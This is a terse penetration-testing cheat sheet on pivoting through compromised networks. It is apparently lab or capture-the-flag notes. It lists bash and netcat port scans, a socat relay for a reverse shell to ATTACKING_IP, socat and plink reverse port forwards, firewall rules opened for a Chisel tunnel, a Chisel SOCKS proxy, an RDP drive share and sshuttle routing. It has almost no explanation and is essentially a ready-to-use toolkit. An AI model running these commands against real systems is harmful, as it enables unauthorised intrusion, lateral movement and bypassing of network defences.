Pivoting
DNS records
$ nmcli dev show
Bash port scan
$ for i in {1..65535}; do (echo > /dev/tcp/192.168.1.1/$i) >/dev/null 2>&1 && echo $i is open; done
for i in $(seq 1 254); do nc -zv -w 1 172.16.50.$i 445; done
for i in $(seq 4800 4900); do nc -zv -w 1 172.16.208.217 $i; done
socat
//Reverse Shell Relay
nc -lvnp 443
./socat tcp-l:8000 tcp:ATTACKING_IP:443 &
Port forwarding (quiet)
socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
./socat tcp:ATTACKING_IP:8001 tcp:TARGET_IP:TARGET_PORT,fork &
plink.exe
C:\Windows\Temp\plink.exe -ssh -l kali -pw <YOUR PASSWORD HERE> -R 127.0.0.1:9833:127.0.0.1:3389 192.168.118.4
cmd.exe /c echo y | .\plink.exe -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -N
Firewall add port
firewall-cmd --zone=public --add-port PORT/tcp
netsh advfirewall firewall add rule name="Chisel-MuirlandOracle" dir=in action=allow protocol=tcp localport=47000
Relay listener
./socat tcp-l:8000 tcp:ATTACKING_IP:443 &
xfreerdp share
xfreerdp /v:10.200.63.150 /u:getsystem /p:toor +clipboard /dynamic-resolution /drive:/opt/pivoting/Post-Exploitation,share
Chisel Forward SOCKS Proxy:
./chisel server -p LISTEN_PORT --socks5
To connect:
./chisel client TARGET_IP:LISTEN_PORT PROXY_PORT:socks
sshuttle
sshuttle -r user@172.16.0.5 --ssh-cmd "ssh -i private_key" 172.16.0.0/24 -x 172.16.0.5